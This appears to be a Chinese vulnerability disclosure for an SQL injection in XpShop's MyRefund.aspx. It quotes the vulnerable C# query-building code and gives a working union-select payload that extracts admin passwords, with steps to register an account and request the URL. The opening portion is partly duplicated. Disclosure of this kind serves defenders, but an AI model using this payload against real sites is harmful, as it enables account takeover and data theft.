### 简要描述: ### 详细说明: 漏洞位置:xpshop.webui.MyRefund ``` protected void Page_Load(object sender, EventArgs e) { if (base.CurrentUser == null) { string str = "Login.aspx?ReturnUrl=/" + WebUIBase.ShopFolder + "MyRefund.aspx"; base.Response.Redirect("/" + WebUIBase.ShopFolder + str); } else { if (base.CurrentUser.Name == "anonymous") { string str = "index." + this.config.html; base.Response.Write(base.GetResourceString("MsgPleaseSignInFirst")); base.Response.Write(Utils.Redirect("/" + WebUIBase.ShopFolder + str)); } if (!base.IsPostBack) { if (base.Request.QueryString["type"] != null && base.Request.QueryString["Action"] != null) { string text = base.Request.QueryString["Action"]; if (text != null && text == "GetProducts") { this.GetProducts(); } base.Response.End(); } ``` 跟进函数GetProducts: private void GetProducts() { string orderNo = base.Request.QueryString["OrderNo"]; OrderDB orderDB = new OrderDB(); int orderID = orderDB.GetOrderID(orderNo, base.CurrentUser.MemberID); string text; if...
### 简要描述: ### 详细说明: 漏洞位置:xpshop.webui.MyRefund ``` protected void Page_Load(object sender, EventArgs e) { if (base.CurrentUser == null) { string str = "Login.aspx?ReturnUrl=/" + WebUIBase.ShopFolder + "MyRefund.aspx"; base.Response.Redirect("/" + WebUIBase.ShopFolder + str); } else { if (base.CurrentUser.Name == "anonymous") { string str = "index." + this.config.html; base.Response.Write(base.GetResourceString("MsgPleaseSignInFirst")); base.Response.Write(Utils.Redirect("/" + WebUIBase.ShopFolder + str)); } if (!base.IsPostBack) { if (base.Request.QueryString["type"] != null && base.Request.QueryString["Action"] != null) { string text = base.Request.QueryString["Action"]; if (text != null && text == "GetProducts") { this.GetProducts(); } base.Response.End(); } ``` 跟进函数GetProducts: private void GetProducts() { string orderNo = base.Request.QueryString["OrderNo"]; OrderDB orderDB = new OrderDB(); int orderID = orderDB.GetOrderID(orderNo, base.CurrentUser.MemberID); string text; if (orderID == 0) { text = "{'OrderExist':'false','Products':[]}"; } 跟进函数GetOrderID: ``` public int GetOrderID(string orderNo, int memberID) { object obj = XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, string.Concat(new object[] { "SELECT OrderID FROM Orders WHERE OrderNo = '", orderNo, "' AND MemberID = ", memberID }), null); return (obj != null) ? ((int)obj) : 0; } ``` payload: /myrefund.aspx?type=1&action=GetProducts&OrderNo=1' union select password from admin-- 利用方法,注册这个账户,然后访问上面这个url ### 漏洞证明: http://**.**.**.**/myrefund.aspx?type=1&action=GetProducts&OrderNo=1' union select password from admin-- [<img src="https://images.seebug.org/upload/201510/15161245ed94d066c9b7c6a481eadac1bc5c48c1.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/15161245ed94d066c9b7c6a481eadac1bc5c48c1.jpg)
